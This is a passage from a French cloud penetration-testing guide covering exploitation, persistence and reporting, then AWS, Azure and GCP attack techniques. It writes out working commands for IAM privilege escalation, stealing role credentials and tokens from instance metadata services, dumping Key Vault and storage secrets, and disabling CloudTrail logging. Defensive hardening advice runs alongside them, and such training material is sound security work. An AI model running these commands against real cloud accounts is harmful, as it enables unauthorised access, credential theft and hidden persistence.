Pour GCP, gcloud projects list revele les projets accessibles, tandis que gcloud iam service-accounts list et gcloud projects get-iam-policy PROJECT_ID cartographient les comptes de service et les bindings IAM. L'outil gcp_enum automatise cette enumeration en parcourant systematiquement les permissions disponibles.

L'enumeration des services de stockage est systematique. Pour AWS : aws s3 ls puis aws s3 ls s3://bucket-name --recursive pour chaque bucket decouvert. Pour Azure : az storage account list suivi de az storage container list --account-name NOM. Pour GCP : gsutil ls puis gsutil ls -la gs://bucket-name/. L'objectif est d'identifier les donnees sensibles accessibles et les permissions de stockage mal configurees.

L'enumeration réseau couvre les groupes de sécurité, les VPC, les sous-réseaux et les regles de pare-feu. Pour AWS : aws ec2 describe-security-groups et aws ec2 describe-network-acls. Pour Azure : az network nsg list et az network nsg rule list. Pour GCP : gcloud compute firewall-rules list. Les regles autorisant le trafic entrant depuis 0.0.0.0/0 sur des ports sensibles (22, 3389, 3306, 5432) constituent des findings critiques.

2.3 Phase d'exploitation et escalade de privileges

La phase d'exploitation vise a demontrer l'impact concret des vulnérabilités identifiees. En contexte cloud, l'exploitation se concentre principalement sur l'escalade de privileges IAM, l'acces non autorise aux donnees et le mouvement lateral entre services et comptes.

L'escalade de privileges IAM est le vecteur d'exploitation le plus courant en environnement cloud. La recherche de Rhino Security Labs a identifie plus de 30 chemins d'escalade de privileges distincts dans AWS IAM. Par exemple, un utilisateur disposant de la permission iam:CreatePolicyVersion peut creer une nouvelle version de sa propre politique avec des permissions administrateur. De meme, un utilisateur avec iam:PassRole et lambda:CreateFunction peut creer une fonction Lambda associee a un role administrateur et l'executer pour obtenir des privileges eleves.

Exemple concret d'escalade via iam:CreatePolicyVersion sur AWS :

aws iam create-policy-version --policy-arn arn:aws:iam::ACCOUNT:policy/ma-policy --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' --set-as-default

Sur Azure, l'escalade de privileges exploite souvent les attributions de roles dans Entra ID. Un utilisateur disposant du role Application Administrator peut creer un service principal avec des permissions elevees. Le role Privileged Role Administrator permet d'attribuer n'importe quel role, y compris Global Administrator. L'exploitation des managed identities permet également d'heriter des permissions d'une ressource Azure.

Sur GCP, les chemins d'escalade incluent l'exploitation des comptes de service avec des permissions excessives. La permission iam.serviceAccountKeys.create sur un compte de service privilegie permet de générer une cle et d'usurper son identite. La permission deploymentmanager.deployments.create permet de déployer des ressources avec les privileges du compte de service Deployment Manager, qui dispose souvent de permissions etendues.

Precautions lors de l'exploitation

L'exploitation en environnement cloud de production comporte des risques significatifs. Evitez toute action destructrice (suppression de ressources, modification de donnees). Documentez chaque commande exécutée avec son horodatage. Privilegiez les demonstrations de faisabilite (proof of concept) aux exploitations completes. En cas de doute sur l'impact d'une action, consultez le commanditaire de l'audit avant de proceder. La creation de ressources supplementaires (instances EC2, fonctions Lambda) pour demonstrer une vulnérabilité doit etre validee au prealable.

2.4 Phase de post-exploitation et mouvement lateral

La post-exploitation en environnement cloud vise a evaluer l'etendue de la compromission possible a partir d'un acces initial. Elle inclut la persistence, le mouvement lateral et l'exfiltration de donnees.

La persistence dans le cloud peut prendre plusieurs formes. Sur AWS, un attaquant peut creer des cles d'acces supplementaires pour un utilisateur IAM (aws iam create-access-key --user-name victime), déployer une fonction Lambda declenchee periodiquement pour maintenir l'acces, ou configurer un role assumable depuis un compte externe. Sur Azure, la creation d'un service principal avec des credentials longue duree ou l'ajout d'une federation d'identite sur une application existante permet de maintenir un acces persistant. Sur GCP, la generation de cles de compte de service supplementaires ou la creation d'un projet fantome lie au meme compte de facturation sont des techniques de persistence courantes.

Le mouvement lateral dans le cloud s'effectue principalement via les relations de confiance entre comptes et services. Les roles cross-account AWS, les abonnements Azure lies au meme tenant Entra ID, et les projets GCP au sein de la meme organisation offrent autant de chemins de mouvement lateral. L'exploitation des VPC peering, des endpoints de service prives et des connexions VPN entre environnements cloud et on-premise etend encore le perimetre de compromission potentiel.

L'exfiltration de donnees en environnement cloud peut etre subtile et difficile a détecter. La copie d'un snapshot EBS vers un compte externe, le partage d'un bucket S3 avec une politique de ressource permissive, ou l'envoi de donnees vers un endpoint externe via une fonction Lambda sont des techniques d'exfiltration qui contournent souvent les mécanismes de détection bases sur le trafic réseau.

2.5 Reporting et classification des vulnérabilités

Le rapport de pentest cloud doit adapter les standards de classification aux specificites du cloud. Le CVSS (Common Vulnerability Scoring System) reste la référence pour la notation des vulnérabilités, mais son application aux mauvaises configurations cloud nécessite une adaptation. Une politique IAM trop permissive ne correspond pas a un CVE spécifique, mais son impact peut etre critique.

Le rapport doit inclure pour chaque vulnérabilité : une description claire du problème, le service cloud affecte, la preuve d'exploitation (captures d'écran, commandes exécutées et leurs resultats), l'impact potentiel (confidentialite, intégrité, disponibilite), la probabilite d'exploitation, le score de risque resultant, et une recommandation de remediation concrete avec les commandes ou configurations a appliquer.

La classification des findings cloud suit généralement une echelle a quatre niveaux : critique (acces administrateur au compte, exfiltration de donnees sensibles possible), haute (escalade de privileges significative, acces non autorise a des services sensibles), moyenne (mauvaise configuration creant un risque indirect, absence de chiffrement), faible (ecart par rapport aux bonnes pratiques sans impact direct demonstrable). Cette classification doit etre adaptee au contexte spécifique de l'organisation auditee.

A retenir : méthodologie en 5 phases

Un pentest cloud structure suit cinq phases distinctes : (1) la reconnaissance passive pour cartographier la surface d'attaque, (2) l'enumeration active des services et des permissions, (3) l'exploitation des vulnérabilités identifiees, (4) la post-exploitation pour evaluer l'etendue de la compromission, et (5) le reporting avec des recommandations actionnables. Chaque phase doit etre documentee en temps reel pour garantir la tracabilite et la reproductibilite des findings.

Chapitre 3 : Pentest AWS - IAM, S3, EC2, Lambda, CloudTrail

Surface d'attaque AWS Compte AWS IAM Users, Roles, Policies Compute EC2, Lambda, ECS Storage S3, EBS, RDS Network VPC, SG, NACLs Logging CloudTrail, CloudWatch Secrets SSM, Secrets Manager Vecteurs d'attaque principaux Privesc IAM IMDS SSRF S3 public Lambda injection

3.1 Exploitation des faiblesses IAM AWS

AWS Identity and Access Management (IAM) constitue le pilier central de la sécurité AWS et, par consequent, la cible prioritaire de tout pentest AWS. La complexite du système de permissions AWS, avec ses politiques basées sur JSON, ses conditions, ses limites de permissions et ses politiques de session, cree un terrain fertile pour les mauvaises configurations exploitables.

L'enumeration initiale des permissions est la premiere étape. L'outil enumerate-iam de Andres Riancho permet de decouvrir les permissions effectives d'un jeu de credentials en testant systematiquement les appels API AWS. Cette approche par force brute est plus fiable que l'analyse statique des politiques, car elle prend en compte les SCP (Service Control Policies), les limites de permissions et les politiques de session qui peuvent restreindre les droits effectifs.

python3 enumerate-iam.py --access-key AKIAIOSFODNN7EXAMPLE --secret-key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

Les chemins d'escalade de privileges IAM documentes par Rhino Security Labs incluent plus de 30 techniques distinctes. Parmi les plus courantes, on trouve l'exploitation de iam:CreatePolicyVersion pour modifier les permissions d'une politique existante, l'utilisation de iam:AttachUserPolicy ou iam:AttachRolePolicy pour s'attribuer la politique AdministratorAccess, et l'exploitation de iam:PassRole combinee avec des services comme Lambda, EC2 ou Glue pour heriter des permissions d'un role privilegie.

L'outil Pacu, le framework d'exploitation AWS de Rhino Security Labs, automatise la détection et l'exploitation de ces chemins d'escalade. Le module iam__privesc_scan analyse les permissions de l'utilisateur courant et identifie les chemins d'escalade possibles :

Pacu (session:pentest) > run iam__privesc_scan

L'analyse des politiques IAM revele frequemment des wildcards excessifs. Une politique autorisant "Action": "s3:*" sur "Resource": "*" donne un acces complet a tous les buckets S3 du compte, y compris ceux contenant des donnees sensibles. Les conditions manquantes sur les politiques de confiance des roles (trust policies) permettent a n'importe quel utilisateur ou service du compte d'assumer le role. La politique suivante est un exemple classique de mauvaise configuration :

{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::123456789012:root"},"Action":"sts:AssumeRole"}]}

Cette politique autorise n'importe quelle entite du compte a assumer le role, ce qui inclut potentiellement des utilisateurs non privilegies. Un pentester verifiera systematiquement les trust policies de tous les roles pour identifier de tels chemins d'escalade.

Defense : durcissement IAM AWS

Appliquez le principe du moindre privilege en utilisant IAM Access Analyzer pour identifier les permissions non utilisees. Activez les SCP au niveau de l'organisation pour limiter les actions dangereuses. Utilisez les conditions IAM (aws:SourceIp, aws:MultiFactorAuthPresent) pour restreindre les contextes d'utilisation. Implementez des limites de permissions (permissions boundaries) pour borner les droits maximaux attribuables. Desactivez la creation de cles d'acces longue duree au profit des roles IAM et des credentials temporaires via AWS STS.

3.2 Attaques sur Amazon S3

Amazon Simple Storage Service (S3) est l'un des services AWS les plus utilises et les plus frequemment mal configures. Les buckets S3 publics ont ete a l'origine de nombreuses fuites de donnees majeures, malgre les avertissements repetes d'Amazon et les mécanismes de protection ajoutes au fil des ans (S3 Block Public Access, bucket policy warnings).

La decouverte de buckets S3 s'effectue par plusieurs méthodes. L'enumeration par force brute de noms de buckets bases sur le nom de l'entreprise, ses marques et ses projets reste efficace. L'outil cloud_enum automatise cette recherche. Les requetes DNS sur les domaines de l'entreprise revelent souvent des CNAME pointant vers des buckets S3. L'analyse du code source des applications web et des applications mobiles revele frequemment des noms de buckets codes en dur.

Une fois un bucket identifie, l'evaluation des permissions s'effectue en testant progressivement les operations possibles :

aws s3 ls s3://bucket-cible/ --no-sign-request

Cette commande teste l'acces anonyme (non authentifie) au bucket. L'option --no-sign-request envoie la requete sans credentials. Si le listing reussit, le bucket est publiquement accessible en lecture. Les tests suivants evaluent les permissions d'ecriture (aws s3 cp test.txt s3://bucket-cible/), les permissions sur les ACL du bucket (aws s3api get-bucket-acl) et les permissions sur la politique du bucket (aws s3api get-bucket-policy).

Les attaques avancees sur S3 incluent l'exploitation des politiques de bucket mal configurees. Une politique autorisant s3:PutBucketPolicy a un principal large permet a un attaquant de modifier la politique du bucket pour s'accorder un acces complet. L'exploitation des ACL (Access Control Lists) legacy, lorsqu'elles accordent WRITE_ACP au groupe AuthenticatedUsers, permet de modifier les ACL pour obtenir un acces complet au bucket.

Le server-side request forgery (SSRF) vers le service de metadonnees EC2 via des objets S3 contenant du code HTML ou JavaScript constitue un vecteur d'attaque indirect. Si une application web sert des objets S3 dans un contexte de confiance, un attaquant peut injecter du contenu malveillant dans un objet pour exploiter d'autres vulnérabilités.

3.3 Exploitation des instances EC2 et du service de metadonnees

Amazon Elastic Compute Cloud (EC2) fournit les ressources de calcul virtuelles dans AWS. Les instances EC2 presentent une surface d'attaque qui combine les vulnérabilités classiques des systèmes d'exploitation avec les specificites cloud, notamment le service de metadonnees d'instance (IMDS).

Le service de metadonnees EC2 (accessible a l'adresse http://169.254.169.254) fournit des informations sensibles aux instances, notamment les credentials temporaires du role IAM associe. L'exploitation de ce service via une SSRF a ete le vecteur d'attaque utilise dans la compromission de Capital One en 2019. IMDSv1, qui repond a de simples requetes HTTP GET sans authentification, est particulierement vulnerable :

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

Cette commande retourne le nom du role IAM associe a l'instance. Une seconde requete recupere les credentials temporaires :

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/NOM-DU-ROLE

La réponse contient l'AccessKeyId, le SecretAccessKey et le SessionToken permettant d'agir avec les permissions du role IAM de l'instance. AWS a introduit IMDSv2, qui impose un mécanisme de session basée sur un token PUT, rendant l'exploitation via SSRF significativement plus difficile (mais pas impossible dans certains cas) :

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/

Au-dela du service de metadonnees, l'audit des instances EC2 couvre les groupes de sécurité (regles de pare-feu), les user data (scripts d'initialisation pouvant contenir des secrets), les volumes EBS (chiffrement, snapshots publics), et la configuration réseau (exposition publique, VPC peering). La commande suivante recupere les user data d'une instance, qui contiennent souvent des mots de passe ou des cles d'API :

aws ec2 describe-instance-attribute --instance-id i-1234567890abcdef0 --attribute userData --query "UserData.Value" --output text | base64 -d

Les snapshots EBS constituent également une cible interessante. Un snapshot public ou partage avec un compte externe peut etre monte sur une instance controlee par l'attaquant pour en extraire les donnees. La commande aws ec2 describe-snapshots --owner-ids self --query "Snapshots[?Public==true]" identifie les snapshots publics du compte.

CVE-2024-21626 : Leaky Vessels

La vulnérabilité Leaky Vessels (CVE-2024-21626) dans runc, le runtime de conteneurs utilise par ECS et EKS, permettait une evasion de conteneur en exploitant une fuite de descripteur de fichier lors de l'execution de WORKDIR. Cette vulnérabilité illustre que les instances EC2 executant des conteneurs heritent des vulnérabilités de la pile de conteneurisation, ajoutant une couche de complexite a l'audit de sécurité. AWS a deploye des correctifs pour ses services manages (ECS, EKS), mais les instances EC2 autogeres necessitaient une mise a jour manuelle de runc.

3.4 Pentest des fonctions Lambda et des services serverless

AWS Lambda introduit un approche d'execution différent qui modifie la surface d'attaque. Les fonctions Lambda s'executent dans un environnement sandbox isole, avec une duree d'execution limitee et un système de fichiers en lecture seule (a l'exception de /tmp). Cependant, elles heritent des permissions du role IAM qui leur est associe, ce qui cree des opportunites d'escalade de privileges.

L'enumeration des fonctions Lambda et de leurs configurations revele souvent des informations sensibles :

aws lambda list-functions --query "Functions[].{Name:FunctionName,Role:Role,Runtime:Runtime}"

aws lambda get-function --function-name ma-fonction

Les variables d'environnement des fonctions Lambda contiennent frequemment des secrets (cles d'API, mots de passe de bases de donnees, tokens d'authentification). L'injection d'événements malveillants dans les declencheurs Lambda (API Gateway, S3, SQS, SNS) peut permettre l'execution de code arbitraire si la fonction ne valide pas correctement ses entrees. Les attaques par injection de commandes dans les fonctions qui executent des commandes système via os.system() ou subprocess sont courantes.

La technique de persistance via Lambda backdoor consiste a creer une fonction Lambda avec un role privilegie, declenchee par un événement periodique CloudWatch Events (cron). Cette fonction peut exfiltrer des donnees, creer des cles d'acces, ou maintenir un canal de communication avec l'attaquant. La détection de ces backdoors nécessite une surveillance des creations et modifications de fonctions Lambda via CloudTrail.

3.5 Audit de CloudTrail et evasion de la journalisation

AWS CloudTrail enregistre les appels API effectues dans le compte AWS. C'est l'outil principal de détection et d'investigation forensique dans AWS. Un pentester doit comprendre les mécanismes de CloudTrail pour evaluer la capacité de détection de l'organisation et pour identifier les angles morts dans la journalisation.

L'enumeration de la configuration CloudTrail revele le niveau de surveillance en place :

aws cloudtrail describe-trails

aws cloudtrail get-trail-status --name mon-trail

aws cloudtrail get-event-selectors --trail-name mon-trail

Les techniques d'evasion de CloudTrail sont documentees a des fins d'audit defensif. Certaines actions AWS ne sont pas enregistrees par CloudTrail par defaut (data events S3, events Lambda invoke). Les appels API effectues dans certaines regions ou CloudTrail n'est pas active echappent a la journalisation. La desactivation de CloudTrail (aws cloudtrail stop-logging) ou la suppression des logs sont des actions detectables mais qui peuvent etre exécutées si le pentester dispose des permissions suffisantes.

Les services qui operent au niveau des donnees (S3 GetObject, Lambda Invoke, DynamoDB GetItem) ne sont journalises que si les data events sont explicitement actives dans la configuration CloudTrail. De nombreuses organisations n'activent que les management events par defaut, creant un angle mort significatif sur les acces aux donnees. Un audit CloudTrail complet verifie que les data events sont actives pour les services critiques et que les logs sont stockes dans un bucket S3 avec un verrouillage d'intégrité (S3 Object Lock).

Attention : regions non surveillees

Si CloudTrail n'est pas configure en mode multi-region, un attaquant peut effectuer des actions dans des regions non surveillees. Par exemple, creer des ressources dans la region ap-southeast-1 alors que CloudTrail n'est actif que dans eu-west-1. Verifiez systematiquement que la configuration CloudTrail couvre toutes les regions AWS avec aws cloudtrail describe-trails --query "trailList[].{Name:Name,IsMultiRegion:IsMultiRegionTrail}". L'absence de couverture multi-region est un finding de severite haute.

Chapitre 4 : Pentest Azure - Entra ID, RBAC, Storage, App Services, Key Vault

Surface d'attaque Microsoft Azure Tenant Entra ID Abonnement Production Abonnement Dev/Test App Services Web Apps, Functions Storage Blobs, Files, Queues Key Vault Secrets, Cles, Certs AKS / VMs Kubernetes, IaaS Vecteurs d'attaque Azure Role assignment abuse Managed Identity App Registration Token replay

4.1 Enumeration et attaques sur Entra ID (ex-Azure AD)

Microsoft Entra ID (anciennement Azure Active Directory) est le service de gestion des identites et des acces de Microsoft Azure. Il gere l'authentification et l'autorisation pour l'ensemble des services Azure, Microsoft 365 et les applications tierces integrees. L'audit d'Entra ID est donc un prealable indispensable a tout pentest Azure.

L'enumeration d'Entra ID commence par la collecte d'informations sur le tenant. L'outil ROADtools de Dirk-jan Mollema permet de collecter l'integralite du graphe Entra ID via l'API Microsoft Graph et l'ancienne API Azure AD Graph :

roadrecon auth -u utilisateur@domaine.com -p MotDePasse

roadrecon gather

roadrecon gui

ROADtools fournit une interface graphique pour explorer les utilisateurs, les groupes, les applications, les service principals, les roles d'annuaire, les politiques d'acces conditionnel et les relations entre ces entites. Cette vue globale est essentielle pour identifier les chemins d'escalade de privileges.

Les roles d'annuaire Entra ID definissent les permissions au niveau du tenant. Le role Global Administrator accorde un controle total sur le tenant. D'autres roles comme Application Administrator, Cloud Application Administrator et Privileged Role Administrator offrent des chemins d'escalade vers Global Administrator. Un pentester cartographiera les attributions de roles d'annuaire pour identifier les utilisateurs disposant de roles privilegies et evaluer la protection de ces comptes (MFA, acces conditionnel, PIM).

Les applications et les service principals représentent un vecteur d'attaque majeur. Les applications enregistrees dans Entra ID disposent de permissions (deleguees ou application) sur l'API Microsoft Graph et d'autres API. Un attaquant disposant du role Application Administrator peut ajouter des credentials a une application existante disposant de permissions elevees, puis utiliser ces credentials pour agir avec les permissions de l'application :

az ad app credential reset --id APP-OBJECT-ID --append

Les consentements d'application (OAuth consent) constituent un autre vecteur. Si la politique de consentement du tenant autorise les utilisateurs a consentir aux applications, un attaquant peut creer une application malveillante demandant des permissions etendues (lecture des emails, acces aux fichiers) et inciter les utilisateurs a consentir via un lien d'autorisation OAuth2. Cette technique, connue sous le nom d'illicit consent grant, a ete utilisee dans de nombreuses campagnes de phishing ciblees.

Definition : Service Principal vs Application

Dans Entra ID, une application (App Registration) est un objet de configuration global qui definit les permissions demandees et les credentials. Un service principal (Enterprise Application) est l'instanciation locale de cette application dans un tenant spécifique. Lorsqu'une application multi-tenant est consentie dans un tenant, un service principal est cree localement. Les permissions effectives sont definies par l'intersection des permissions de l'application et du consentement accorde dans le tenant. Cette distinction est cruciale pour comprendre les chemins d'exploitation cross-tenant.

4.2 Exploitation du RBAC Azure et des Managed Identities

Azure Role-Based Access Control (RBAC) gere les autorisations sur les ressources Azure (abonnements, groupes de ressources, ressources individuelles). Contrairement aux roles d'annuaire Entra ID qui operent au niveau du tenant, le RBAC Azure controle l'acces aux ressources cloud (VMs, storage accounts, key vaults, etc.).

L'enumeration des attributions de roles RBAC s'effectue avec les commandes Azure CLI :

az role assignment list --all --query "[].{Principal:principalName,Role:roleDefinitionName,Scope:scope}"

Les roles RBAC les plus critiques incluent Owner (controle total + gestion des acces), Contributor (controle total sans gestion des acces), User Access Administrator (gestion des acces uniquement) et les roles spécifiques a chaque service (Key Vault Administrator, Storage Blob Data Contributor, etc.). Un utilisateur disposant du role User Access Administrator peut s'attribuer n'importe quel autre role, y compris Owner, constituant un chemin d'escalade direct.

Les roles personnalises mal definis représentent un risque important. Un role personnalise avec Microsoft.Authorization/roleAssignments/write dans ses actions autorisees permet d'attribuer des roles a d'autres entites, creant un chemin d'escalade. L'audit des roles personnalises doit etre systematique :

az role definition list --custom-role-only true

Les Managed Identities constituent un mécanisme de sécurité concu pour eliminer la gestion de credentials dans le code. Chaque ressource Azure peut disposer d'une System-Assigned Managed Identity (liee au cycle de vie de la ressource) ou d'une User-Assigned Managed Identity (independante). Cependant, ces identites heritent des permissions RBAC qui leur sont attribuees, et une mauvaise configuration peut permettre une escalade de privileges significative.

L'exploitation des Managed Identities depuis une ressource compromise (par exemple, une VM ou un App Service) s'effectue via le service de metadonnees Azure (IMDS), accessible a l'adresse http://169.254.169.254. La recuperation d'un token d'acces s'effectue comme suit :

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Le token JWT obtenu peut ensuite etre utilise pour effectuer des appels API Azure Resource Manager avec les permissions de la Managed Identity. Si cette identite dispose de permissions etendues (par exemple, Contributor sur l'abonnement), l'impact est critique.

4.3 Attaques sur Azure Storage et les donnees

Azure Storage regroupe plusieurs services de stockage : Blob Storage (objets), File Storage (partages de fichiers SMB/NFS), Queue Storage (files de messages) et Table Storage (NoSQL). Chaque service possede ses propres mécanismes d'autorisation et ses propres risques de mauvaise configuration.

L'enumeration des comptes de stockage s'effectue via Azure CLI :

az storage account list --query "[].{Name:name,Location:location,Kind:kind,AccessTier:accessTier}"

Les mécanismes d'autorisation Azure Storage incluent les cles de compte de stockage (acces complet), les Shared Access Signatures (SAS, acces delegue avec contraintes), le RBAC Azure et l'authentification anonyme. Chaque mécanisme présente des risques spécifiques.

Les cles de compte de stockage accordent un acces total et irrevocable au compte de stockage. Si une cle est compromise, l'attaquant peut lire, modifier et supprimer toutes les donnees. La rotation des cles necessitant une mise a jour de toutes les applications utilisant l'ancienne cle, de nombreuses organisations negligent cette operation. La commande suivante liste les cles d'un compte de stockage :

az storage account keys list --account-name moncompte --query "[].{KeyName:keyName,Value:value}"

Les SAS tokens mal generes constituent un risque frequent. Un SAS token avec une date d'expiration trop eloignee, des permissions excessives (rwdlacup) ou sans restriction d'adresse IP offre un acces prolonge et non revocable au stockage. Les SAS tokens sont souvent inclus dans des URLs partagees par email ou dans des fichiers de configuration, et leur exposition equivaut a une fuite de credentials.

L'acces anonyme aux conteneurs Blob est la configuration la plus dangereuse. Si un conteneur est configure avec un acces public (container ou blob), n'importe qui peut lire son contenu sans authentification. La verification systematique des conteneurs publics est essentielle :

az storage container list --account-name moncompte --query "[?properties.publicAccess!=null].{Name:name,Access:properties.publicAccess}"

4.4 Exploitation des App Services et Azure Functions

Azure App Service est la plateforme PaaS de Microsoft pour l'hebergement d'applications web, d'API REST et de backends mobiles. Azure Functions est le service serverless equivalent a AWS Lambda. Ces services presentent des vecteurs d'attaque spécifiques lies a leur integration dans l'ecosysteme Azure.

L'enumeration des App Services revele les applications deployees, leurs configurations et leurs integrations :

az webapp list --query "[].{Name:name,State:state,URL:defaultHostName,OS:kind}"

Les paramètres d'application (App Settings) contiennent frequemment des secrets : chaines de connexion aux bases de donnees, cles d'API, tokens d'authentification. Un pentester disposant de permissions suffisantes peut les extraire :

az webapp config appsettings list --name mon-app --resource-group mon-rg

Le service Kudu (accessible a https://mon-app.scm.azurewebsites.net) fournit un acces administratif a l'environnement d'execution de l'App Service, incluant une console SSH/PowerShell, l'acces au système de fichiers et aux logs. Si le pentester obtient des credentials permettant l'acces a Kudu, il peut extraire le code source de l'application, les variables d'environnement et potentiellement les credentials de la Managed Identity associee.

Les Azure Functions partagent les memes vecteurs d'attaque que les App Services, auxquels s'ajoutent les risques lies aux bindings (declencheurs d'événements). Une fonction declenchee par un HTTP trigger sans authentification (authLevel: anonymous) est accessible publiquement. Les fonctions declenchees par des événements Blob Storage, Queue Storage ou Service Bus peuvent etre manipulees si l'attaquant dispose d'un acces en ecriture a ces services sources.

Attaque : extraction de secrets via la Managed Identity d'un App Service

Si un App Service dispose d'une Managed Identity avec des permissions sur Azure Key Vault, un attaquant ayant compromis l'application peut exploiter cette identite pour extraire tous les secrets du Key Vault. Depuis le contexte d'execution de l'App Service, il suffit de demander un token via le endpoint IMDS interne (http://169.254.169.254/metadata/identity/oauth2/token) puis d'utiliser ce token pour appeler l'API Key Vault. Cette chaine d'attaque illustre l'importance de limiter les permissions des Managed Identities au strict necessaire.

4.5 Audit d'Azure Key Vault et gestion des secrets

Azure Key Vault est le service de gestion des secrets, cles de chiffrement et certificats de Microsoft Azure. Il constitue souvent la cible finale d'un pentest Azure, car il centralise les secrets les plus sensibles de l'organisation. L'audit de Key Vault couvre la configuration du coffre, les politiques d'acces, et la protection des secrets stockes.

L'enumeration des Key Vaults s'effectue avec :

az keyvault list --query "[].{Name:name,Location:location,EnableSoftDelete:properties.enableSoftDelete}"

Les politiques d'acces Key Vault definissent qui peut effectuer quelles operations sur les secrets, cles et certificats. Deux modeles d'autorisation coexistent : le modele basée sur les politiques d'acces (vault access policies) et le modele RBAC Azure. Le modele RBAC est recommande car il offre une gestion plus fine et une integration avec les mécanismes d'audit Azure.

Un pentester evaluera les permissions effectives sur chaque Key Vault en verifiant les politiques d'acces et les attributions RBAC. L'extraction des secrets est l'objectif final :

az keyvault secret list --vault-name mon-vault --query "[].{Name:name,Enabled:attributes.enabled}"

az keyvault secret show --vault-name mon-vault --name mon-secret --query "value"

Les fonctionnalites de protection de Key Vault incluent le soft delete (suppression logique permettant la recuperation), la purge protection (interdiction de suppression definitive pendant une periode de retention), et le déploiement dans un réseau virtuel prive. L'absence de ces protections constitue un finding de sécurité. La journalisation des acces Key Vault via Azure Monitor et les diagnostic settings doit etre verifiee pour garantir la détection des acces non autorises.

L'exploitation des cles cryptographiques stockees dans Key Vault peut permettre de dechiffrer des donnees protegees, de signer des tokens d'authentification frauduleux ou de compromettre des certificats TLS. Les permissions keys/decrypt, keys/sign et certificates/get sur un Key Vault contenant des cles de production représentent un risque critique.

Chapitre 5 : Pentest GCP - IAM, Cloud Storage, GKE, Cloud Functions

Surface d'attaque Google Cloud Platform Organisation GCP Projet Production Projet Staging Projet Dev IAM Roles, Service Accounts Cloud Storage Buckets, objets GKE Kubernetes manage Cloud Functions Serverless compute Vecteurs d'attaque GCP SA key exposure ACL misconfiguration Pod escape Function injection

5.1 Specificites de GCP IAM et comptes de service

Google Cloud Platform utilise un modele IAM distinct de ceux d'AWS et Azure. Les permissions GCP sont organisees en roles predefinies (curated roles) et roles personnalises, attribues a des membres (utilisateurs Google, comptes de service, groupes Google) au niveau de l'organisation, du dossier, du projet ou de la ressource individuelle. La hierarchie des ressources GCP (organisation > dossiers > projets > ressources) implique un heritage des politiques IAM du niveau superieur vers le niveau inferieur.

L'enumeration des politiques IAM GCP s'effectue avec la commande :

gcloud projects get-iam-policy PROJET-ID --format=json

Les comptes de service (service accounts) sont le mécanisme principal d'authentification des applications et des services dans GCP. Chaque projet dispose d'un compte de service par defaut et les services manages creent automatiquement des comptes de service supplementaires (agents de service). Les cles de compte de service au format JSON, nécessaires pour l'authentification depuis l'exterieur de GCP, constituent une cible de choix pour les attaquants :

gcloud iam service-accounts keys list --iam-account sa@projet.iam.gserviceaccount.com

L'escalade de privileges dans GCP IAM exploite plusieurs vecteurs. La permission iam.serviceAccountKeys.create sur un compte de service privilegie permet de générer une cle et d'usurper son identite. La permission iam.serviceAccounts.actAs combinee avec la creation de ressources (instances Compute Engine, fonctions Cloud Functions) permet d'attacher un compte de service privilegie a une nouvelle ressource. La permission resourcemanager.projects.setIamPolicy permet de modifier la politique IAM du projet pour s'accorder des permissions arbitraires.

L'outil gcp-iam-collector automatise la collecte et l'analyse des politiques IAM GCP pour identifier les chemins d'escalade. L'outil PMapper (Principal Mapper), bien que concu pour AWS, a inspire des equivalents GCP permettant de visualiser les relations entre les entites IAM et les chemins d'escalade possibles.

Specificite GCP : roles de base vs roles predefinies

GCP distingue les roles de base (primitifs) - Owner, Editor, Viewer - des roles predefinies plus granulaires. Les roles de base sont extremement larges : Editor accorde des permissions de modification sur presque toutes les ressources du projet. Google recommande d'eviter les roles de base au profit des roles predefinies ou personnalises. Un audit GCP verifiera systematiquement l'absence de roles de base attribues a des membres non justifies, car un utilisateur avec le role Editor dispose de suffisamment de permissions pour compromettre l'integralite du projet.

5.2 Attaques sur Cloud Storage GCP

Google Cloud Storage est le service de stockage d'objets de GCP, equivalent a Amazon S3. Les buckets Cloud Storage sont sujets aux memes types de mauvaises configurations que les buckets S3, avec quelques specificites liees au modele d'autorisation GCP.

La decouverte de buckets Cloud Storage s'effectue par enumeration de noms previsibles et par analyse des applications web de la cible. L'outil cloud_enum teste automatiquement les noms de buckets GCP. L'acces non authentifie se verifie avec :

gsutil ls gs://bucket-cible/

GCP Cloud Storage supporte deux systèmes d'autorisation : les ACL (Access Control Lists) heritage et le modele d'acces uniforme (Uniform Bucket-Level Access). Le modele d'acces uniforme, recommande par Google, desactive les ACL au profit du controle d'acces IAM exclusivement. Les buckets utilisant encore les ACL heritage sont vulnerables aux memes attaques que les buckets S3 avec des ACL trop permissives.

La permission allUsers ou allAuthenticatedUsers dans la politique IAM d'un bucket rend celui-ci accessible publiquement ou a tout utilisateur Google authentifie respectivement. La verification de ces permissions est essentielle :

gsutil iam get gs://bucket-cible/

Les signed URLs GCP, equivalentes aux pre-signed URLs AWS, permettent un acces temporaire aux objets. Comme les SAS tokens Azure, des signed URLs avec des durees d'expiration excessives ou des permissions trop larges représentent un risque de fuite de donnees.

5.3 Pentest de Google Kubernetes Engine (GKE)

Google Kubernetes Engine (GKE) est le service Kubernetes manage de GCP. L'audit de GKE couvre la configuration du cluster, les politiques RBAC Kubernetes, l'isolation des workloads et l'integration avec GCP IAM.

L'enumeration des clusters GKE s'effectue avec :

gcloud container clusters list

gcloud container clusters describe CLUSTER-NAME --zone ZONE

La configuration du cluster revele des informations critiques : version de Kubernetes (presence de vulnérabilités connues), configuration du réseau (VPC-native vs routes-based), activation de Workload Identity (integration IAM GCP / RBAC Kubernetes), configuration de la politique de sécurité des pods, et etat de l'encryption des secrets etcd.

L'acces au service de metadonnees GCP depuis les pods GKE est un vecteur d'attaque majeur. Par defaut, les pods GKE peuvent acceder au service de metadonnees de l'instance sous-jacente (http://169.254.169.254 ou http://metadata.google.internal), heritant ainsi des permissions du compte de service du noeud. Le compte de service par defaut des noeuds GKE dispose souvent de permissions etendues, incluant l'acces a Cloud Storage et a d'autres services GCP :

